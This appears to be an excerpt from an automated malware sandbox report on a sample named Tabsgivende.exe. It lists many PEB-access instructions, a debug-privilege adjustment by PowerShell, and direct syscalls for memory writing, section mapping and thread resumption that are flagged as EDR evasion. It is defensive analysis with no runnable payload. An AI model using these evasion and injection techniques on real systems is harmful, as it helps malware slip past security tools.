Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22520AD0 mov eax, dword ptr fs:[00000030h]	18_2_22520AD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22554AD0 mov eax, dword ptr fs:[00000030h]	18_2_22554AD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22554AD0 mov eax, dword ptr fs:[00000030h]	18_2_22554AD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22576ACC mov eax, dword ptr fs:[00000030h]	18_2_22576ACC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22576ACC mov eax, dword ptr fs:[00000030h]	18_2_22576ACC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22576ACC mov eax, dword ptr fs:[00000030h]	18_2_22576ACC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255AAEE mov eax, dword ptr fs:[00000030h]	18_2_2255AAEE
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255AAEE mov eax, dword ptr fs:[00000030h]	18_2_2255AAEE
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22558A90 mov edx, dword ptr fs:[00000030h]	18_2_22558A90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h]	18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h]	18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h]	18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h]	18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h]	18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h]	18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h]	18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h]	18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h]	18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F4A80 mov eax, dword ptr fs:[00000030h]	18_2_225F4A80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22528AA0 mov eax, dword ptr fs:[00000030h]	18_2_22528AA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22528AA0 mov eax, dword ptr fs:[00000030h]	18_2_22528AA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22576AA4 mov eax, dword ptr fs:[00000030h]	18_2_22576AA4
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B6B40 mov eax, dword ptr fs:[00000030h]	18_2_225B6B40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B6B40 mov eax, dword ptr fs:[00000030h]	18_2_225B6B40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EAB40 mov eax, dword ptr fs:[00000030h]	18_2_225EAB40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225C8B42 mov eax, dword ptr fs:[00000030h]	18_2_225C8B42
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251CB7E mov eax, dword ptr fs:[00000030h]	18_2_2251CB7E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h]	18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h]	18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h]	18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h]	18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h]	18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h]	18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h]	18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h]	18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h]	18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254EB20 mov eax, dword ptr fs:[00000030h]	18_2_2254EB20
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254EB20 mov eax, dword ptr fs:[00000030h]	18_2_2254EB20
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E8B28 mov eax, dword ptr fs:[00000030h]	18_2_225E8B28
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E8B28 mov eax, dword ptr fs:[00000030h]	18_2_225E8B28
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225CEBD0 mov eax, dword ptr fs:[00000030h]	18_2_225CEBD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22540BCB mov eax, dword ptr fs:[00000030h]	18_2_22540BCB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22540BCB mov eax, dword ptr fs:[00000030h]	18_2_22540BCB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22540BCB mov eax, dword ptr fs:[00000030h]	18_2_22540BCB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22520BCD mov eax, dword ptr fs:[00000030h]	18_2_22520BCD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22520BCD mov eax, dword ptr fs:[00000030h]	18_2_22520BCD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22520BCD mov eax, dword ptr fs:[00000030h]	18_2_22520BCD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22528BF0 mov eax, dword ptr fs:[00000030h]	18_2_22528BF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22528BF0 mov eax, dword ptr fs:[00000030h]	18_2_22528BF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22528BF0 mov eax, dword ptr fs:[00000030h]	18_2_22528BF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254EBFC mov eax, dword ptr fs:[00000030h]	18_2_2254EBFC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225ACBF0 mov eax, dword ptr fs:[00000030h]	18_2_225ACBF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530BBE mov eax, dword ptr fs:[00000030h]	18_2_22530BBE
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530BBE mov eax, dword ptr fs:[00000030h]	18_2_22530BBE
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22550854 mov eax, dword ptr fs:[00000030h]	18_2_22550854
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22524859 mov eax, dword ptr fs:[00000030h]	18_2_22524859
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22524859 mov eax, dword ptr fs:[00000030h]	18_2_22524859
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22532840 mov ecx, dword ptr fs:[00000030h]	18_2_22532840
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225AE872 mov eax, dword ptr fs:[00000030h]	18_2_225AE872
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225AE872 mov eax, dword ptr fs:[00000030h]	18_2_225AE872
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B6870 mov eax, dword ptr fs:[00000030h]	18_2_225B6870
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B6870 mov eax, dword ptr fs:[00000030h]	18_2_225B6870
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225AC810 mov eax, dword ptr fs:[00000030h]	18_2_225AC810
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22542835 mov eax, dword ptr fs:[00000030h]	18_2_22542835
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22542835 mov eax, dword ptr fs:[00000030h]	18_2_22542835
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22542835 mov eax, dword ptr fs:[00000030h]	18_2_22542835
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22542835 mov ecx, dword ptr fs:[00000030h]	18_2_22542835
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22542835 mov eax, dword ptr fs:[00000030h]	18_2_22542835
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22542835 mov eax, dword ptr fs:[00000030h]	18_2_22542835
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255A830 mov eax, dword ptr fs:[00000030h]	18_2_2255A830
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254E8C0 mov eax, dword ptr fs:[00000030h]	18_2_2254E8C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255C8F9 mov eax, dword ptr fs:[00000030h]	18_2_2255C8F9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255C8F9 mov eax, dword ptr fs:[00000030h]	18_2_2255C8F9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EA8E4 mov eax, dword ptr fs:[00000030h]	18_2_225EA8E4
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225AC89D mov eax, dword ptr fs:[00000030h]	18_2_225AC89D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22520887 mov eax, dword ptr fs:[00000030h]	18_2_22520887
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A0946 mov eax, dword ptr fs:[00000030h]	18_2_225A0946
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225AC97C mov eax, dword ptr fs:[00000030h]	18_2_225AC97C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22546962 mov eax, dword ptr fs:[00000030h]	18_2_22546962
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22546962 mov eax, dword ptr fs:[00000030h]	18_2_22546962
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22546962 mov eax, dword ptr fs:[00000030h]	18_2_22546962
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2256096E mov eax, dword ptr fs:[00000030h]	18_2_2256096E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2256096E mov edx, dword ptr fs:[00000030h]	18_2_2256096E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2256096E mov eax, dword ptr fs:[00000030h]	18_2_2256096E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225AC912 mov eax, dword ptr fs:[00000030h]	18_2_225AC912
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22518918 mov eax, dword ptr fs:[00000030h]	18_2_22518918
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22518918 mov eax, dword ptr fs:[00000030h]	18_2_22518918
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259E908 mov eax, dword ptr fs:[00000030h]	18_2_2259E908
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259E908 mov eax, dword ptr fs:[00000030h]	18_2_2259E908
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A892A mov eax, dword ptr fs:[00000030h]	18_2_225A892A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B892B mov eax, dword ptr fs:[00000030h]	18_2_225B892B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A9D0 mov eax, dword ptr fs:[00000030h]	18_2_2252A9D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A9D0 mov eax, dword ptr fs:[00000030h]	18_2_2252A9D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A9D0 mov eax, dword ptr fs:[00000030h]	18_2_2252A9D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A9D0 mov eax, dword ptr fs:[00000030h]	18_2_2252A9D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A9D0 mov eax, dword ptr fs:[00000030h]	18_2_2252A9D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252A9D0 mov eax, dword ptr fs:[00000030h]	18_2_2252A9D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225549D0 mov eax, dword ptr fs:[00000030h]	18_2_225549D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EA9D3 mov eax, dword ptr fs:[00000030h]	18_2_225EA9D3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B69C0 mov eax, dword ptr fs:[00000030h]	18_2_225B69C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225529F9 mov eax, dword ptr fs:[00000030h]	18_2_225529F9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225529F9 mov eax, dword ptr fs:[00000030h]	18_2_225529F9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225AE9E0 mov eax, dword ptr fs:[00000030h]	18_2_225AE9E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A89B3 mov esi, dword ptr fs:[00000030h]	18_2_225A89B3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A89B3 mov eax, dword ptr fs:[00000030h]	18_2_225A89B3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A89B3 mov eax, dword ptr fs:[00000030h]	18_2_225A89B3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h]	18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h]	18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h]	18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h]	18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h]	18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h]	18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h]	18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h]	18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h]	18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h]	18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h]	18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h]	18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h]	18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225209AD mov eax, dword ptr fs:[00000030h]	18_2_225209AD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225209AD mov eax, dword ptr fs:[00000030h]	18_2_225209AD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F2E4F mov eax, dword ptr fs:[00000030h]	18_2_225F2E4F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F2E4F mov eax, dword ptr fs:[00000030h]	18_2_225F2E4F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526E71 mov eax, dword ptr fs:[00000030h]	18_2_22526E71
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A0E7F mov eax, dword ptr fs:[00000030h]	18_2_225A0E7F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A0E7F mov eax, dword ptr fs:[00000030h]	18_2_225A0E7F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A0E7F mov eax, dword ptr fs:[00000030h]	18_2_225A0E7F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22518E1D mov eax, dword ptr fs:[00000030h]	18_2_22518E1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h]	18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h]	18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h]	18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254AE00 mov ecx, dword ptr fs:[00000030h]	18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h]	18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h]	18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h]	18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h]	18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h]	18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254AE00 mov eax, dword ptr fs:[00000030h]	18_2_2254AE00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B6E20 mov eax, dword ptr fs:[00000030h]	18_2_225B6E20
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B6E20 mov eax, dword ptr fs:[00000030h]	18_2_225B6E20
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B6E20 mov ecx, dword ptr fs:[00000030h]	18_2_225B6E20
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22558EF5 mov eax, dword ptr fs:[00000030h]	18_2_22558EF5
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526EE0 mov eax, dword ptr fs:[00000030h]	18_2_22526EE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526EE0 mov eax, dword ptr fs:[00000030h]	18_2_22526EE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526EE0 mov eax, dword ptr fs:[00000030h]	18_2_22526EE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526EE0 mov eax, dword ptr fs:[00000030h]	18_2_22526EE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251AE90 mov eax, dword ptr fs:[00000030h]	18_2_2251AE90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251AE90 mov eax, dword ptr fs:[00000030h]	18_2_2251AE90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251AE90 mov eax, dword ptr fs:[00000030h]	18_2_2251AE90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22552E9C mov eax, dword ptr fs:[00000030h]	18_2_22552E9C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22552E9C mov ecx, dword ptr fs:[00000030h]	18_2_22552E9C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225BAEB0 mov eax, dword ptr fs:[00000030h]	18_2_225BAEB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225BAEB0 mov eax, dword ptr fs:[00000030h]	18_2_225BAEB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225ACEA0 mov eax, dword ptr fs:[00000030h]	18_2_225ACEA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225ACEA0 mov eax, dword ptr fs:[00000030h]	18_2_225ACEA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225ACEA0 mov eax, dword ptr fs:[00000030h]	18_2_225ACEA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251CF50 mov eax, dword ptr fs:[00000030h]	18_2_2251CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251CF50 mov eax, dword ptr fs:[00000030h]	18_2_2251CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251CF50 mov eax, dword ptr fs:[00000030h]	18_2_2251CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251CF50 mov eax, dword ptr fs:[00000030h]	18_2_2251CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251CF50 mov eax, dword ptr fs:[00000030h]	18_2_2251CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251CF50 mov eax, dword ptr fs:[00000030h]	18_2_2251CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255CF50 mov eax, dword ptr fs:[00000030h]	18_2_2255CF50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225C0F50 mov eax, dword ptr fs:[00000030h]	18_2_225C0F50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A4F40 mov eax, dword ptr fs:[00000030h]	18_2_225A4F40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A4F40 mov eax, dword ptr fs:[00000030h]	18_2_225A4F40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A4F40 mov eax, dword ptr fs:[00000030h]	18_2_225A4F40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A4F40 mov eax, dword ptr fs:[00000030h]	18_2_225A4F40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F4F68 mov eax, dword ptr fs:[00000030h]	18_2_225F4F68
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254AF69 mov eax, dword ptr fs:[00000030h]	18_2_2254AF69
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254AF69 mov eax, dword ptr fs:[00000030h]	18_2_2254AF69
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22522F12 mov eax, dword ptr fs:[00000030h]	18_2_22522F12

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
